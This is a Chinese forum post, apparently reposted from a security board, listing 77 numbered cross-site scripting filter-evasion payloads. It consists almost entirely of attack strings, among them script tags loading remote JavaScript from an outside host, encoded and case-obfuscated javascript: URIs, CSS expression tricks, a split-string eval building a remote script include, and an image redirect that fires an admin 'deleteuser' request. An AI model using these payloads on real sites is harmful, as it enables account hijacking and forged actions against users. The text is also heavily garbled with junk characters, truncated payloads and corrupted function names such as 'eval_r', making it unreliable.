貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
2 x" V4 }1 ?2 h8 `% s- t. u# D# y' b5 _5 M; Y) G, q/ t
(1)普通的XSS JavaScript注入( S# Z; h) c0 G- _
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
' |* Z- [4 _% |, f) q- ]6 r3 k1 _! f( r. ?
(2)IMG标签XSS使用JavaScript命令
# T" K6 \9 S: H( b! E5 Q) Y <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
j: m! {) S4 O( w. A/ Q
8 f4 v& O0 n/ C) F (3)IMG标签无分号无引号 ]& u' ~ C# y7 d
<IMG SRC=javascript:alert(‘XSS’)>8 j. _* ~. m( r2 T W
@* b+ \& z2 v$ b3 v/ O1 U& {; l (4)IMG标签大小写不敏感. u ?( b" }! [& d" B/ u1 F* ^
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>7 y: P* A9 V; h# t9 t
8 `" G' G' h4 w* p1 X ?/ y
(5)HTML编码(必须有分号)
& s) _- K% A$ _$ t <IMG SRC=javascript:alert(“XSS”)>
$ H, d( d3 \, s# `/ o$ [5 ^% d6 n( ?( k& `3 m! b; d
(6)修正缺陷IMG标签3 v3 c3 d4 d4 W% d |+ J
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
! D; Q3 _ J3 F4 x' k
. m" z' u+ [4 _, ]; ^( c* f7 | (7)formCharCode标签(计算器)
8 n' L* V, d: C0 J <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>; d! F7 ]3 N9 A: C8 l% Y) ?% J- G
! A& \1 j, u9 K
(8)UTF-8的Unicode编码(计算器)
* m q0 p% i! G3 T$ m; G <IMG SRC=jav..省略..S')>4 g5 Y- h$ q2 F: S- c- M
, o4 Q( G5 t9 \( } (9)7位的UTF-8的Unicode编码是没有分号的(计算器)
, X3 L9 T2 t/ m- W; K <IMG SRC=jav..省略..S')>
$ H r% I2 h6 t9 {/ h" K; c8 U2 B {4 b! O
(10)十六进制编码也是没有分号(计算器)$ X7 e5 `1 Z3 ^
<IMG SRC=java..省略..XSS')>$ `* y5 i6 E* o: |" q7 ?
) o9 D. ]6 }. g( o/ s# _6 T
(11)嵌入式标签,将Javascript分开& G0 l/ U; q' k7 ]9 @# P7 y
<IMG SRC=”jav ascript:alert(‘XSS’);”>
2 U1 F) f+ Y" Y9 A
# z$ z) h1 n: Q8 }! l5 |1 G+ w, t (12)嵌入式编码标签,将Javascript分开3 ^, p+ N" y0 h D* n, W6 s; e( E5 E8 \
<IMG SRC=”jav ascript:alert(‘XSS’);”>9 N+ \0 z: ^; {$ q
# f B% z+ g/ p7 A- p8 J
(13)嵌入式换行符
0 Y k* A3 H9 \& ]/ m, S/ N6 c <IMG SRC=”jav ascript:alert(‘XSS’);”>5 p; H5 v- u8 U& e
/ i+ o$ u/ J: t, d$ f: i (14)嵌入式回车: e. S4 e( Y3 [; k' l
<IMG SRC=”jav ascript:alert(‘XSS’);”>
1 |+ j$ X1 n& x" E, w
5 Z2 o: {7 M$ o; C% O (15)嵌入式多行注入JavaScript,这是XSS极端的例子 v/ ~, J2 B2 F. I
<IMG SRC=”javascript:alert(‘XSS‘)”>
, P, } i( p* R* ]/ G$ ]1 z6 ], t+ P" f0 v- e2 I# D4 ^
(16)解决限制字符(要求同页面)
" D) n0 n* H* i7 Q3 r$ B, M I <script>z=’document.’</script>
+ R) `8 p) a6 d <script>z=z+’write(“‘</script>
0 L& _1 z7 g) o9 N H <script>z=z+’<script’</script>8 m7 q! f8 X/ S: i) [0 Z
<script>z=z+’ src=ht’</script>
- \5 j- f B7 ` a ] <script>z=z+’tp://ww’</script>
c: ~" }& r8 H! {; H <script>z=z+’w.shell’</script>
; m8 \3 ~/ }: @( V <script>z=z+’.net/1.’</script>5 `: q5 s( I# p" `: A
<script>z=z+’js></sc’</script>
3 g$ W7 A( w: P4 ~( v( X <script>z=z+’ript>”)’</script># [7 q* z% M# S6 s, ~
<script>eval_r(z)</script>
1 T6 c+ h% R3 p/ c4 J/ N' P4 \' C# d' ?' |0 Y' P# x0 E( G1 }
(17)空字符! d8 s" C! ?+ s+ @0 X9 d
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
, G Q( h a+ L" F* E
; @2 D2 n$ B- z- X; _5 {+ } (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
6 ^8 r5 B5 } T: s3 M* q1 { perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
$ S$ `' d8 X+ ?8 m7 t" I- I, s5 G# k: G3 l6 \: a
(19)Spaces和meta前的IMG标签* i/ \ W9 ^( W2 J
<IMG SRC=” javascript:alert(‘XSS’);”>
6 x+ V x8 ~. e$ Q% ], D9 x
& T; w0 a$ T. T4 U( a' y3 S" m (20)Non-alpha-non-digit XSS* _$ l3 T/ y" L5 ?, Q, K" t5 m6 T
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>5 N9 e% k- E/ a3 {8 k6 F
$ ~+ X7 q# K+ }7 ^2 p- i' Q
(21)Non-alpha-non-digit XSS to 2" b8 Q6 @+ n7 C
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>" Y8 t( W3 M# T1 r9 B, N
, t9 |9 P2 a7 V: V$ m7 R* _ (22)Non-alpha-non-digit XSS to 3. I a+ n. F6 ]7 s9 ] P1 Q
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
; d+ S: ^* E$ }% X+ @9 [* L6 w2 g% z; N7 [
(23)双开括号
1 L2 x" L- G' }: K6 ~* u <<SCRIPT>alert(“XSS”);//<</SCRIPT> Z4 P- A7 c0 m7 m8 y! V
' W, F1 z- Z, ]4 M2 t
(24)无结束脚本标记(仅火狐等浏览器)9 \6 g0 z' a! Z" X
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>+ o3 Y2 j J& e9 A3 W% M
- G4 u9 _# k4 u3 C (25)无结束脚本标记2 W4 }8 G2 E4 x* ~" g) f0 g
<SCRIPT SRC=//3w.org/XSS/xss.js>
7 P/ p: L+ x: ]$ k8 N" U
% q3 x6 e. w' a& [6 X* j& @9 I (26)半开的HTML/JavaScript XSS
, O. T A2 c7 x9 `5 Y" T <IMG SRC=”javascript:alert(‘XSS’)”
2 I, r4 f& o! p6 D, g* Z) ~$ q: ?# c/ d z/ X
(27)双开角括号
" ^2 J( d+ j# x4 a) G( B* d: s' t <iframe src=http://3w.org/XSS.html <) z" D) w/ f5 X m, k% U+ ]
1 [8 f9 t+ S8 z2 Q6 O Z (28)无单引号 双引号 分号$ v( V- n$ d- ?
<SCRIPT>a=/XSS/
6 k+ f* M( s5 Y& v alert(a.source)</SCRIPT>) E B) P% G2 t+ E& W) `6 T9 }9 g
( x6 C2 ~% h9 e2 n1 [! u" Q (29)换码过滤的JavaScript' A/ I5 Z0 E2 w: C" o! Z
\”;alert(‘XSS’);//' f& v2 ]3 ^7 S8 m' ~0 X+ Z4 `& d
J& v R" h: G (30)结束Title标签
: h8 z) ?9 r% b3 @% a% {& ~1 O7 @ </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>1 p* a4 p, B5 D+ ` ]6 v( s+ |
. E+ B3 X, @/ ~1 n7 t, l (31)Input Image$ I& x+ X& ^! N6 v. S" T
<INPUT SRC=”javascript:alert(‘XSS’);”>
+ B/ N5 W" n9 a! d! K$ r3 Q- p# {$ J9 L& t3 i" F5 N" l& c B
(32)BODY Image; S6 z* V/ k$ d- w9 ]: s
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>. h- Y4 U" M! g- {
: H# f, U( q0 [. g7 U (33)BODY标签. C/ G+ V4 N, o! `
<BODY(‘XSS’)>
5 @* Y2 P- T4 n3 n$ h( d7 q( r, j7 |! D
(34)IMG Dynsrc
6 Z. @, A: m" B <IMG DYNSRC=”javascript:alert(‘XSS’)”>
6 s' A4 w( T% w+ ?6 Q+ Y) e6 h
0 ?, ?9 Z7 C w; J, ? ? (35)IMG Lowsrc
7 x. H; T8 }( T3 d6 q) c( j <IMG LOWSRC=”javascript:alert(‘XSS’)”>' }) z# M, \$ N# W) U8 j; T, t& \
' E( ~4 _! O! p- y( k' \1 X
(36)BGSOUND) a7 F; o* m1 h1 m( f0 Q; O
<BGSOUND SRC=”javascript:alert(‘XSS’);”>- }' K$ Y/ o9 A! l: U+ P. x
$ u* }5 I9 b: B6 l (37)STYLE sheet
; Z# D4 j- p$ f! R, u( o1 U <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>1 E1 o% D. M& ^2 J" k
/ R4 @- `& q% y, U @' w- l (38)远程样式表- E! _+ |! w. O1 j! J
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
' [4 {8 X8 G+ d9 R" P
. K* v& y8 H) @0 z- g1 G9 l (39)List-style-image(列表式). |8 \- s. q6 ^! i2 X5 J' o$ w
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
9 z: r/ {2 ^3 B n2 p6 U2 Q# d: x) W! X$ P0 o6 u+ F
(40)IMG VBscript4 d8 S& e9 }$ Q6 A# x
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS6 S5 d7 K: X, a H+ p) Z, ^
* t" ?% N. A3 B* g
(41)META链接url
1 ^; T, s+ _% ?* w! C <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>" C$ V9 K: y o3 h
/ b! |6 v5 [4 b% v) z (42)Iframe
3 X+ _9 }& e n: \7 x <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
# N5 j- L7 l4 @6 O4 a* T; j. a7 X. n; o! ]3 S1 Z) K9 I3 w/ ?
(43)Frame* L1 a1 ^5 j, Y9 `2 v# F7 Y
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
& p! T0 N; |+ M" `; b" y" h$ ~! ?4 U5 D$ j# n3 u& S& l) o5 V
(44)Table
( f6 \! t& U7 ^/ S& l <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>) \: R8 y) @- `) l' s: G- D) p
; N; k4 D4 u$ E) Y- A3 R' |& R
(45)TD
, T6 F3 s- S3 l: s$ e6 _+ m <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>. l% I c6 ~$ ^) `( h
# V6 \# ?9 W% `; i5 e5 V
(46)DIV background-image ]0 g5 o) Z; c3 {7 K" i2 u: ~/ R
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>7 {$ e) }; K3 i- l
. z6 G7 A: }2 A" j
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
" ?, L/ m% D, R4 j6 y <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
; L' J. S. o) F h
2 w+ l& g' S0 r Z$ i) Y1 ^ (48)DIV expression4 f t5 O+ X& _/ w7 M
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
. e$ m! W8 y( w6 t# |3 x& ^' o1 r6 e2 A
(49)STYLE属性分拆表达9 w0 A" [" L9 |
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>; S* M- p" A# [% P$ g0 s0 {
5 Z! M) k" s- {, D! L$ r5 o
(50)匿名STYLE(组成:开角号和一个字母开头)4 r1 u9 F8 j$ G: F' R, q
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>4 i$ s" ]' A3 H& R
- R% x; O' e6 V, l! ]. X8 ^
(51)STYLE background-image
6 k. ^- V% Q0 H <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
+ m( u: s, O$ V5 m' Z
3 G; y- w! b2 A v (52)IMG STYLE方式% ~5 P: e3 f" S. R; `
exppression(alert(“XSS”))’>
4 ?2 K/ Y9 u0 K. q5 Z
* D& K1 M* i" `) x$ D (53)STYLE background
7 E8 Q0 A7 P; F$ X) ` <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>2 M' O$ ?; _) I1 n; t
9 K* ]) A, m" a9 f( I
(54)BASE8 I, d. `- ?5 u; u* V
<BASE HREF=”javascript:alert(‘XSS’);//”>1 b/ x9 X3 e3 n( Y4 H4 u% a7 ^
* z+ C" Q4 t3 k. O' f" E. U! f5 G
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS- K/ S) t. l W) B+ ?
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>: ?1 [( }0 p, z& O5 U5 D: j
_ {: Y2 _1 k
(56)在flash中使用ActionScrpt可以混进你XSS的代码
' g/ y' k) _! t$ r; s# l a=”get”;& t; D, B* i- l3 K7 s/ u. Q3 |4 r" [
b=”URL(\”";
% z2 S8 F/ V; |* C1 ^, P! }5 N( F c=”javascript:”;2 S# h, F" W: {+ x _+ z
d=”alert(‘XSS’);\”)”;
7 b/ B# C: B1 T7 |/ r eval_r(a+b+c+d);
3 @9 _' c% L) k9 L# R3 d2 N
8 P4 F* N9 y/ {. H" e* [ (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
* g3 g- N/ m: ^8 d2 `. m- j <HTML xmlns:xss>* c6 s% H$ H' d# A' ~. C5 ?9 D: u5 p
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>& e m6 ]/ U1 b9 Q% M8 _
<xss:xss>XSS</xss:xss>! ]: ~/ Z" Z0 q2 d9 n
</HTML>
& m$ C- x1 j l4 ?* Y4 Z3 i; W$ i. [: ^! x
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
3 v; E, m8 ^3 h7 M <SCRIPT SRC=””></SCRIPT>; ?8 o, k4 j$ Q; P
$ |/ u1 l# }1 n
(59)IMG嵌入式命令,可执行任意命令
4 m- j+ j, n3 n <IMG SRC=”http://www.XXX.com/a.php?a=b”> U+ r, D7 ]$ X3 B
. d& T. i9 E( ?$ ?0 K
(60)IMG嵌入式命令(a.jpg在同服务器)
2 F4 e2 `1 D. m8 G2 C1 e' G, a Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser% l+ d* X; X( V8 A9 t
& `4 _, U& A1 c' ]- M (61)绕符号过滤
; p2 F6 j; M7 ?1 k5 G <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>) R3 ~6 W& {* G# w; N
6 d+ Y2 x: y0 x( c+ S
(62)
8 }& t+ h5 i" r <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>0 n& b A; N/ D6 `% F
H. V3 W5 A) G, f: l (63)
Z6 z1 c" h% ^" }; s <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>5 c9 j E9 V0 b
5 Q! `) q1 |( H. N+ O- z1 ] (64): A$ ^1 G- a i: f
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>) b4 O7 T' Q0 @5 c z, Y: {4 Q6 b
6 K1 X; R; ]! \
(65)) y X; B% g6 v
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
! \$ T5 p( E* x7 \2 |# |+ |4 h/ o% I, n" _+ n+ `. F! h' @- K
(66)) G2 u+ n) Q; O8 k; T
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>6 a) k' S3 D) O
D' _! f' w* M4 [, F! F
(67)
H2 j/ o4 _6 x <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
5 v. C: e" N" y7 Q8 [6 c! @, A" C9 E! q3 O1 I, t
(68)URL绕行. U/ ~: P$ G* _$ n, s! X
<A HREF=”http://127.0.0.1/”>XSS</A>
/ Z8 z4 F2 J# `7 E$ b
# P6 M" e, V, j y3 \& C3 T7 ~ (69)URL编码8 U1 n4 l/ [) Z# B3 p
<A HREF=”http://3w.org”>XSS</A>8 }" m9 T8 z' `' z
$ _; |! J p' ]0 S9 l7 t
(70)IP十进制& _2 Y, x; p I2 r# |# V
<A HREF=”http://3232235521″>XSS</A>+ h e! F) {: n8 Q" R6 V* W
, P7 u1 @0 z: J9 Y5 N
(71)IP十六进制
6 u- V4 E8 W. u* K8 | <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
1 f' L; Z! w }. }% l7 B$ {
, z" y6 X z: H3 G (72)IP八进制8 v4 L$ ]7 Q1 K0 D$ S3 F% b$ F
<A HREF=”http://0300.0250.0000.0001″>XSS</A>* b9 D$ S% t* D* W) D% q: [; E1 n
% ~9 |" n& R- e; [" J% c (73)混合编码1 r# r/ J4 A; q: u$ c
<A HREF=”h
0 \1 b/ j" [0 m, `- e tt p://6 6.000146.0×7.147/”">XSS</A>8 P5 w) ~5 X9 y0 q
) i; ~ S4 g& r3 n0 U% @' }
(74)节省[http:] Y" V: z0 p# z8 I1 [5 ^: x+ w
<A HREF=”//www.google.com/”>XSS</A>
3 V: p5 V0 X7 v0 G c" P7 a5 z' m3 {. e( ^, w1 H- D( K
(75)节省[www]) ~, Z$ h4 J& B9 v5 f+ t+ r" T" g7 z
<A HREF=”http://google.com/”>XSS</A>/ J/ S! p4 ?" z8 b8 a2 H
9 I( m( U% ^# b# X; j6 q
(76)绝对点绝对DNS
5 C; {7 f3 a( j* a <A HREF=”http://www.google.com./”>XSS</A>
0 \# S: s& `. v( I1 r3 v2 i/ h ~( W
, l( j( l) B5 T/ a" `- ~2 C (77)javascript链接; m+ d+ Q. g. W# I& R6 O, d
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |